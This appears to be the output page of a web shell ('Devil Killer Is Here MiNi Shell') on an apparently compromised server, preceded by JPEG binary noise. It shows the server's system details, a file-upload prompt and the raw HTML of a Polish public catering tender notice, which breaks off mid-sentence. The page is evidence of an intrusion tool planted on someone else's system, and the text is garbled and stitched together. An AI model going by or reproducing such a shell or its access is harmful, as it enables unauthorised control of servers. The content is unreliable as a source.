JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220721/0026974501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa cateringu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WARSZAWSKIE CENTRUM INTEGRACJI &#34;INTEGRACYJNA WARSZAWA&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 386636718</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zofii Nałkowskiej 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-886</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 277 55 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp.wci@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">integracyjnawarszawa.bip.um.warszawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Warszawskie Centrum Integracji </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa cateringu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8433742e-08c4-11ed-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00269745</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://integracyjnawarszawa.bip.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">wci.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.	Instrukcja korzystania z Platformy:<br/>3.1.1.	w zakładce „Postępowania”, dalej „Lista postępowań otwartych” wykonawca wybiera niniejsze postępowanie oraz korzystając z polecenia „Zgłoś się do udziału w postępowaniu” przechodzi odpowiednio do Formularza rejestracyjnego – w przypadku, kiedy wykonawca nie posiada konta na Platformie, lub panelu logowania użytkownika do Systemu w przypadku posiadania konta na Platformie;<br/>3.1.2.	po wypełnieniu formularza rejestracyjnego wykonawca otrzymuje wiadomość elektroniczną (e-mail) informującą, że może dokonać pierwszego logowania <br/>do Platformy. Rejestracja nowego konta podlega weryfikacji i akceptacji Operatora, która może potrwać do 24h (8h roboczych).<br/>3.1.3.	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Platformy. <br/>Po wprowadzeniu danych użytkownika tj. adresu e-mail oraz hasła zgłoszenie jest automatycznie akceptowane przez Platformę;<br/>3.1.4.	w zakładce „Załączniki” przedmiotowego postępowania dostępna jest dokumentacja postępowania (SWZ oraz pozostałe dokumenty). Pobranie dokumentu następuje po kliknięciu na wybrany załącznik i wciśnięciu polecenia „Pobierz”. W celu pobrania wszystkich załączników jednocześnie należy wybrać polecenie „Pobierz paczkę”, a następnie „Pobierz wszystkie załączniki organizatora”.<br/>3.1.5.	Zaleca się, aby Wykonawca na bieżąco śledził (sugerujemy codziennie) zmiany jakich w trakcie postępowania może dokonać Zamawiający. Zalecenie dotyczy również informacji jakie Zamawiający kieruje do Wykonawców po zakończeniu składania ofert.<br/>4.	Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>4.1.1.	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej <br/>niż 4/1 mb/s,<br/>4.1.2.	komputer klasy PC lub lub Mac, o następującej konfiguracji: pamięć RAM min. 8 GB, procesor Intel IV 4GHz, jeden z systemów operacyjnych: MS Windows 7, Mac OS x 10.4, Linux, lub ich nowsze wersje,<br/>4.1.3.	zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer minimalnie wersja 11.0.<br/>4.1.4.	włączona obsługa JavaScript,<br/>4.1.5.	zainstalowany program obsługujący stosowane przez wykonawcę formaty plików (np. Acrobat Reader dla plików w formacie .pdf).<br/>5.	Wszelkie dokumenty, oświadczenia, informacje, o których mowa w SWZ, należy wczytać jako załączniki na Platformie, według Instrukcji korzystania z Platformy, dostępnej dla zalogowanych użytkowników w zakładce „Pomoc” – „Instrukcje”.<br/>6.	Zamawiający zaleca wczytywanie na Platformę plików w maksymalnym rozmiarze <br/>do 100 MB.<br/>7.	Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składające się na ofertę, składane są przez wykonawcę przy użyciu zakładki „Załączniki” <br/>w trakcie etapu składania ofert/wniosków.<br/>8.	Dokumenty elektroniczne, oświadczenia, uzupełnienia, elektroniczne kopie dokumentów lub oświadczeń składane przez wykonawcę po złożeniu ofert (np. na wezwanie zamawiającego), składane są przy użyciu zakładki „Pytania/informacje”.<br/>9.	Ewentualne wnioski o wyjaśnienie treści SWZ, itp. składane są przy użyciu zakładki „Pytania informacje”.<br/>10.	Zamawiający dopuszcza przesyłanie plików w formatach danych określonych <br/>w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. <br/>o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j. Dz. U. z 2017 r. poz. 570 z późn. zm.), tj. rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (t.j. Dz. U. z 2017 r. poz. 2247) – w szczególności w formatach: .pdf, .doc, .docx, .rtf lub .odt., xades.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)	Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia obowiązku informacyjnego przewidzianego w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (art. 13 ust. 4).<br/>2)	Ponadto Wykonawca zobowiązany jest wypełnić obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane przekazuje Zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>3)	W celu zapewnienia, że Wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem Wykonawcy w postępowaniu, zobowiązuje się Wykonawcę do złożenia w treści oferty oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO (pkt 6 Formularza ofertowego).<br/>1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, w związku z art. 19 ust. 1 ustawy Pzp, Zamawiający informuje, że: <br/>1)	administratorem danych osobowych ujawnionych celem przeprowadzenia niniejszego postępowania jest Warszawskie Centrum Integracji „Integracyjna Warszawa”, z siedzibą w Warszawie (01-886), ul. Z. Nałkowskiej 11, zwane w dalszej części obowiązku informacyjnego „Centrum”,<br/>2)	Centrum powołało inspektora ochrony danych, z którym można się skontaktować poprzez email, pisząc na adres e-mail: iod.wci@um.warszawa.pl <br/>3)	dane osobowe, podane Centrum przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO – w celu przeprowadzenia postępowania ws. udzielenia zamówienia publicznego, zgodnie z przepisami ustawy Pzp. Po zakończeniu postępowania, dane osobowe będą przechowywane w celach archiwalnych, przez okres 5 lat, zgodnie z ustawą o narodowym zasobie archiwalnym i archiwach, z zastrzeżeniem protokołu z postępowania, którego okres przechowywania przez Zamawiającego określa art. 78 ust. 1 ustawy Pzp (4 lata po zakończeniu postępowania).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">P/03/WCI/Catering/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem Zamówienia jest wykonanie usługi cateringowej (zwanej dalej „usługą” lub „usługą cateringową”) do trzech lokalizacji tj. przy ul. Kaczorowej 39, przy ul. Myśliborskiej 53 <br/>oraz przy ul. Bohaterów 50 w Warszawie. Usługa cateringowa polegać będzie na przygotowaniu<br/> i dostarczeniu gotowych posiłków, na rzecz Warszawskiego Centrum Integracji „Integracyjna Warszawa” zgodnie ze Specyfikacją Warunków Zamówienia, w tym opisem przedmiotu zamówienia, oraz ze złożoną przez Wykonawcę w ramach przedmiotowego postępowania ofertą. <br/>2.	Dla lokalizacji przy ul. Kaczorowej 39 i ul. Myśliborskiej 53 zestaw cateringowy składa się <br/>z ciepłego posiłku na kolację i zimnego suchego prowiantu na śniadanie, dostarczanego przez <br/>7 dni w tygodniu, w godz. 18-19. Dla lokalizacji przy ul. Bohaterów 50 zestaw cateringowy składa się z zimnego posiłku na śniadanie i kolację oraz ciepłego posiłku na obiad <br/>z uwzględnieniem diety lekkostrawnej, dostarczanego przez 7 dni w tygodniu do godziny 13.00. <br/>3.	Dla wskazanych w ust. 2 lokalizacji posiłki będą dostarczane w następujących ilościach: <br/>1)	dla lokalizacji przy ul. Kaczorowej 39 (miejsce schronienia) - maksymalnie 30 030 zestawów cateringowych, oraz maksymalnie 60 060 torebek herbaty i 600,60 kg cukru;<br/>2)	dla lokalizacji przy ul. Myśliborskiej 53 (miejsce schronienia) - maksymalnie 28 665 zestawów cateringowych oraz maksymalnie 57 330 torebek herbaty, 573,30 kg cukru oraz 14 332,5 litrów wody;<br/>3)	dla lokalizacji przy ul. Myśliborskiej 53 (ogrzewalnia) – maksymalnie 21 200 torebek herbaty, 212 kg cukru oraz 5300 litrów wody;<br/>4)	Dla lokalizacji przy ul. Bohaterów 50 (miejsce stałego pobytu) z uwzględnieniem diety lekkostrawnej – maksymalnie 4 095 zestawów cateringowych oraz maksymalnie 12 285 torebek herbaty, 98,28 kg cukru. <br/>4.	Wykonawca zobowiązuje się do dostarczenia do lokalizacji przy ul. Kaczorowej 39, następujących ilości posiłków w ilości dziennej i łącznie w całym okresie obowiązywania Umowy oraz w następujący sposób:<br/>1)	do 110 ciepłych posiłków na kolację dziennie, tj. do 30 030 posiłków łącznie, przy czym minimalna łączna ilość ciepłych posiłków w całym okresie Umowy nie może być niższa niż 15 015;<br/>2)	do 110 porcji suchego prowiantu na śniadanie dziennie, tj. do 30 030 porcji prowiantu łącznie, przy czym minimalna łączna ilość porcji suchego prowiantu w całym okresie Umowy nie może być niższa niż 15 015;<br/>3)	do 220 kompletów ciepłego napoju dziennie, po jednym napoju do posiłku (jeden komplet ciepłego napoju składa się z 1 torebki herbaty i 10 g cukru), tj. do 60 060 kompletów ciepłego napoju łącznie (tj. maksymalnie 60 060 torebek herbaty i 600,60 kg cukru łącznie), przy czym minimalna łączna ilość torebek herbaty nie może być mniejsza niż 30 030, minimalna ilość cukru nie może być mniejsza niż 300,30 kg;<br/>4)	posiłki dostarczane będą do lokalizacji przy ul. Kaczorowej 39 w pojemniku zbiorczym termoizolacyjnym gwarantującym odpowiednią temperaturę, zgodnie z wymaganiami i ilościami podanymi w SWZ. Wraz z posiłkami dostarczona będzie instrukcja serwisowa - ile plastrów/łyżek/kromek itp. przysługuje na 1 osobę. Wykonawca udostępni Zamawiającemu na czas trwania Umowy wózek bemarowy 3 komorowy do podgrzewania posiłków. Wykonawca zobowiązuje się do zapewnienia porcjonera, łyżek i szczypców niezbędnych do serwowania posiłków.<br/>5.	Wykonawca zobowiązuje się do dostarczenia posiłków do lokalizacji przy ul. Myśliborskiej 53 <br/>następujących ilości posiłków w ilości dziennej i łącznie w całym okresie obowiązywania Umowy oraz w następujący sposób:<br/>1)	dla miejsca schronienia:<br/>a)	do 105 ciepłych posiłków na kolację dziennie, tj. do 28 665 posiłków łącznie, przy czym minimalna łączna ilość ciepłych posiłków w całym okresie Umowy nie może być niższa niż 14 333;<br/>b)	do 105 porcji suchego prowiantu na śniadanie dziennie, tj. do 28 665 porcji prowiantu łącznie, przy czym minimalna łączna ilość porcji suchego prowiantu w całym okresie Umowy nie może być niższa niż 14 333;<br/>c)	do 210 kompletów ciepłego napoju dziennie (jeden komplet ciepłego napoju obejmuje 1 torebkę herbaty i 10 g cukru, 0,25 l wody, kubeczek jednorazowy i biodegradowalny, mieszadełko), tj. do 57 330 kompletów ciepłego napoju łącznie (tj. maksymalnie 57 330 torebek herbaty i 573,30 kg cukru i 14332,5 l wody), woda zdatna do picia będzie służyć do przygotowania herbaty, przy czym minimalna ilość torebek herbaty nie może być mniejsza niż 28 665 i nie mniejsza niż 286,65 kg cukru i nie mniejsza niż 7166,25 litrów wody.<br/>2)	dla ogrzewalni przez okres 212 dni, tj. od 1 października 2022 r. do 30 kwietnia 2023 r.: <br/>do 100 kompletów ciepłego napoju dziennie (jeden komplet ciepłego napoju obejmuje <br/>1 torebkę herbaty i 10 g cukru, 0,25 l wody, kubeczek jednorazowy biodegradowalny, mieszadełko), do 21 200 kompletów ciepłego napoju łącznie, tj. maksymalnie 21 200 torebek herbaty i 212 kg cukru i 5 300 litrów wody łącznie, przy czym w okresie 212 dni nie będzie to mniej niż 10 600 torebek herbaty, nie mniej niż 106 kg cukru i nie mniej niż 2 650 litrów wody;<br/><br/>3)	posiłki dostarczane będą do lokalizacji przy ul. Myśliborskiej 53 wskazanych w pkt 1 i 2 powyżej w jednorazowych opakowaniach biodegradowalnych wyporcjowanych na 1 osobę, wraz z jednorazowymi sztućcami (biodegradowalnymi), zgodnie z wymaganiami i ilościami podanymi w SWZ;<br/>6.	Wykonawca zobowiązuje się do dostarczenia do lokalizacji przy ul. Bohaterów 50 następujących ilości posiłków w ilości dziennej i łącznie w całym okresie obowiązywania Umowy oraz w następujący sposób:<br/>1) do 12 posiłków na śniadanie dziennie, tj. do 3 276 posiłków łącznie, przy czym minimalna łączna ilość posiłków w całym okresie Umowy nie może być niższa niż 1 638;<br/>2)	do 12 posiłków na kolację dziennie tj. do 3 276 posiłków łącznie, przy czym minimalna łączna ilość posiłków w całym okresie Umowy nie może być niższa niż 1 638;<br/>3)	do 12 posiłków ciepłego drugiego dania na obiad, tj. do 3 276 posiłków łącznie, <br/>przy czym minimalna łączna ilość ciepłych posiłków na obiad w całym okresie Umowy nie może być niższa niż 1 638;<br/>4)	do 36 kompletów ciepłego napoju dziennie, do każdego posiłku ciepły napój (jeden komplet ciepłego napoju obejmuje 1 torebkę herbaty i do 10 g cukru), tj. do 9 828 kompletów ciepłego napoju łącznie (tj. maksymalnie 9 828 torebek herbaty i 98,28 kg cukru), przy czym minimalna ilość torebek herbaty nie może być mniejsza niż 4 914 i nie mniejsza niż 49,14 kg cukru. <br/>5) dla diety lekkostrawnej posiłki dostarczane będą w następujących ilościach i w następujący sposób: <br/>a)	do 3 posiłków na śniadanie dziennie, tj. do 819 posiłków łącznie, przy czym minimalna łączna ilość posiłków w całym okresie Umowy nie może być niższa niż 410;<br/>b)	do 3 posiłków na kolację dziennie tj. do 819 posiłków łącznie, przy czym minimalna łączna ilość posiłków w całym okresie Umowy nie może być niższa niż 410;<br/>c)	do 3 posiłków na obiad - zupy dziennie tj. do 819 posiłków łącznie, przy czym minimalna łączna ilość posiłków w całym okresie Umowy nie może być niższa niż 410;<br/>d)	do 3 posiłków na obiad – drugie danie dziennie tj. do 819 posiłków łącznie, przy czym minimalna łączna ilość posiłków w całym okresie Umowy nie może być niższa niż 410;<br/>e)	do 9 kompletów ciepłego napoju dziennie, do każdego posiłku ciepły napój (jeden komplet ciepłego napoju obejmuje 1 torebkę herbaty.), tj. do 2 457 kompletów ciepłego napoju łącznie (tj. maksymalnie 2 457 torebek herbaty), przy czym minimalna ilość torebek herbaty nie może być mniejsza niż 1 229.<br/>6)	Zestawy cateringowe będą dostarczane do lokalizacji przy ul. Bohaterów 50 od poniedziałku do niedzieli do godz. 13:00 wraz z dostawą suchego prowiantu na kolację<br/> i śniadanie na następny dzień. Posiłki dostarczane będą do lokalizacji przy ul. Bohaterów 50 w jednorazowych opakowaniach biodegradowalnych wyporcjowanych na 1 osobę, wraz z jednorazowymi sztućcami (biodegradowalnymi) zgodnie z wymaganiami i ilościami podanymi w SWZ. Wymagania dla diety lekkostrawnej określone zostały w załączniku nr 6 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena oferty brutto - znaczenie – 60% <br/> 2) doświadczenie kucharza - 20% <br/> 3) kryterium społeczne – 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kucharza</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>1.1	nie podlegają wykluczeniu z postępowania;<br/>1.2	spełniają warunki udziału w postępowaniu dotyczące:<br/>1.2.1	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie 